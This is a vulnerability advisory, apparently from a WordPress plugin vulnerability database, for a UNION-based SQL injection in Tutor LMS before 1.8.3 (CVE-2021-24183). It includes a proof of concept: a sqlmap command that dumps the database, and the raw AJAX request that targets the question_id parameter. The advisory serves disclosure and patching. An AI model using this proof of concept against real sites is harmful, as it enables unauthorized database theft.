WordPress Plugin Vulnerabilities

Tutor LMS < 1.8.3 - SQL Injection via tutor_quiz_builder_get_question_form

Description

The tutor_quiz_builder_get_question_form AJAX action from the plugin was vulnerable to UNION based SQL injection that could be exploited by students.

Proof of Concept

python3 sqlmap.py -r ~/tutorunion4.txt --dbms=mysql --technique=U -p question_id --dump
Where tutorunion4.txt is

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [URL]
Content-Length: 96
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: [URL]
Referer: [URL]
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [COOKIES]
Connection: close

action=tutor_quiz_builder_get_question_form&question_id=1&quiz_id

Affects Plugins

Plugin icon
tutor
Fixed in 1.8.3

References

CVE
CVE-2021-24183
URL
https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
Yes
WPVDB ID
9b8da6b7-f1d6-4a7d-a621-4ca01e4b7496

Timeline

Publicly Published
2021-03-15 (about 3 years ago)
Added
2021-03-15 (about 3 years ago)
Last Updated
2021-03-20 (about 3 years ago)

Other

Published
Title
Published
2024-03-26
Title
DecaLog < 3.9.1 - Authenticated (Admin+) SQL injection
Published
2022-05-30
Title
Better Find and Replace < 1.3.6 - Admin+ SQLi
Published
2014-10-11
Title
Huge IT Image Gallery 1.0.1 - SQL Injection
Published
2022-07-11
Title
Youzify < 1.2.0 - Unauthenticated SQLi
Published
2016-11-11
Title
Mini Cart Plugin 1.00.1 - Authenticated SQL Injection